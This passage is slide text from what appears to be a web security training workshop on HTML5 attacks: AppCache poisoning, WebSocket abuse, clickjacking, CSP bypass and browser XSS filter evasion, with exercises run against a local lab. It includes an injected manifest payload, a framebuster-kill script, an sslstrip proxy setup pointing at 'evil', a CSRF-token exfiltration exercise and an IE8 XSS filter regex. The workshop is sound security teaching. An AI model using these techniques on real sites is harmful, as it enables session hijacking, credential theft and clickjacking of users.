  • 23. Practice! • http://localvictim/04-cors/ • XSS the victim and alert his user ID Targeting Client side storage & Offline Cache Poisoning
  • 24. AppCache • HTML pages can specify a manifest URL <html manifest=/cache.manifest> • Manifest • text/cache-manifest MIME type • Lists URLs that should be fetched and stored Man in the middle • Eavesdrop / modify traffic • XSS • session hijack (Firesheep) • Doesn’t last long
  • 25. AppCache poison 1. During MITM: inject poison <html manifest="/robots.txt"> ....<script>evil_foo()</script> 2. After MITM: • • • CACHE MANIFEST CACHE: http://victim/ NETWORK: * robots.txt has invalid MIME type poisoned page fetched from cache code runs until offline cache is purged Demo! • http://localvictim/05-offline/ • perform offline attack with sslstrip • google-chrome --proxy-server=http://evil:10000 • payload: alert login & password
  • 26. Using WebSockets for attacks WebSockets • 2-way TCP connection from browser to server • bandwidth efficient • asynchronous - no request / response model • available to JS
  • 27. WebSockets • Handshake similar to HTTP • Optionally encrypted with TLS (wss://) • Dumb protocol • No user authorization • No user authentication WebSockets if (window.WebSocket) { var url = 'ws://host:port/path' ,s = new WebSocket(url); s.onopen = function(e) {}; s.onclose = function(e) {}; s.onmessage = function(e) { // e.data - server sent data }; s.send('hello server!'); }
  • 28. WebSockets security • • • Attack app-level protocols • look for DoS, auth flaws Sometimes plain TCP services are tunneled over WebSockets You can attack servers with: • • • browser - xss browser - third party website custom client Demo! • cd /home/ubuntu/Desktop/remote/06websockets/websockify-master • ./run.sh • http://localvictim/06-websockets/ • login into ws://localvictim:9999 user ‘admin’ • * extract flag from admin home dir
  • 29. Iframe sandboxing & clickjacking Clickjacking • You all know it. • Don’t get framed • Lots of websites use: if (self !== top) { ! top.location = self.location; }
  • 30. Clickjacking - bypass // evil framing victim wanting to jump out of frame var kill_bust = 0 window.onbeforeunload = function(){kill_bust++}; setInterval(function() { if (kill_bust > 0) { kill_bust -= 2; top.location = '204.php'; }}, 1); // basically, a race condition on top reload Clickjacking w/ HTML5 • IFRAME sandbox restricts what a frame can do <iframe src="http://victim.com" sandbox=" allow-forms allow-scripts" /> • no allow-top-navigation => top.location.href = .... fails
  • 31. Practice! • http://localvictim/07-clickjacking/ • clickjack “Delete my account” button Bypassing Content Security Policy
  • 32. CSP • whitelist content on your website with HTTP headers e.g. • Mitigate XSS by forbidding inline scripting • Only allow images from your CDN • Only allow XHR to your API server CSP Content-Security-Policy: default-src: 'none'; style-src: https://my.cdn.net; script-src: 'self' https://ssl.google-analytics.com; img-src: 'self' https://images.cdn.net; report-uri: https://my.com/violations
  • 33. CSP • It’s XSS mitigation, XSS is still possible via obscure vectors • <iframe src=”filesystem://...> • Chrome Extensions • JSONP CSP • You can do much even without XSS • http://lcamtuf.coredump.cx/postxss/ • content extraction - unclosed elements: <img src=’..........<something>......’<else> • other - http://ruxcon.org.au/assets/slides/ CSP-kuza55.pptx
  • 34. CSP • Still fresh concept & rapid development • Fresh scary bugs • https://bugzilla.mozilla.org/show_bug.cgi? id=886164 • Practice! • http://localvictim/08-csp/1.php • send CSRF token to //evil • * http://localvictim/08-csp/2.php • XSS (Firefox). If in Chrome, contact me ;)
  • 35. Browser XSS filters behind the scenes Browser XSS filters • Detect dangerous patterns in HTTP request parameters (GET/POST) • Observe for reflection in HTTP response • Neutralize injection or block entire page • X-Xss-Protection: 0|1
  • 36. Browser XSS filters Browser XSS filters IE8 <[i]?f{r}ame.*?[ /+t]*?src[ /+t]* (j|(&[#()=]x?0*((74)|(4A)|(106)|(6A));?))([t]|(&[#()=]x?0*(9|(13)|(10)|A| D);?))*(a|(&[#()=]x?0*((65)|(41)|(97)|(61));?))([t]|(&[#()=]x?0*(9|(13)|( 10)|A|D);?))*(v|(&[#()=]x?0*((86)|(56)|(118)|(76));?))([t]|(&[#()=]x?0*(9 |(13)|(10)|A|D);?))*(a|(&[#()=]x?0*((65)|(41)|(97)|(61));?))([t]|(&[#()=] x?0*(9|(13)|(10)|A|D);?))*(s|(&[#()=]x?0*((83)|(53)|(115)|(73));?))([t]|( &[#()=]x?0*(9|(13)|(10)|A|D);?))*(c|(&[#()=]x?0*((67)|(43)|(99)|(63));?))( [t]|(&[#()=]x?0*(9|(13)|(10)|A|D);?))*{(r|(&[#()=]x?0*((82)|(52)|(114)|(7 2));?))}([t]|(&[#()=]x?0*(9|(13)|(10)|A|D);?))*(i|(&[#()=]x?0*((73)|(49)| (105)|(69));?))([t]|(&[#()=]x?0*(9|(13)|(10)|A|D);?))*(p|(&[#()=]x?0*((80 )|(50)|(112)|(70));?))([t]|(&[#()=]x?0*(9|(13)|(10)|A|D);?))*(t|(&[#()=]x ?0*((84)|(54)|(116)|(74));?))([t]|(&[#()=]x?0*(9|(13)|(10)|A|D);?))*(:|(& [#()=]x?0*((58)|(3A));?)).
  • 37. Browser XSS filters Chrome • complex rules, discovers different contexts, tries to decode etc. • http://src.chromium.org/viewvc/blink/trunk/ Source/core/html/parser/XSSAuditor.cpp? revision=HEAD&view=markup • Bypasses every other month Browser XSS filters tricks • Use to disable benign scripts (e.g. framebusters) • Only GET / POST matched => use cookies • Multiple param injections = you always win
  • 38. Browser XSS filters ASP.NET tricks • http://soroush.secproject.com/blog/ 2012/06/browsers-anti-xss-methods-in-aspclassic-have-been-defeated/ • concatenation: input1=a&input1=b => a,b • truncation:anything after %00 ignored • transliteration: %u0117 => ė => e Practice! • http://localvictim/09-antixss/1.php • * http://localvictim/09-antixss/irl.php • * http://www.sdl.me/xssdemo/getxss.asp • XSS’em all (Chrome)!
  • 39. That is all. thx. q&a? Liked that? //blog.kotowicz.net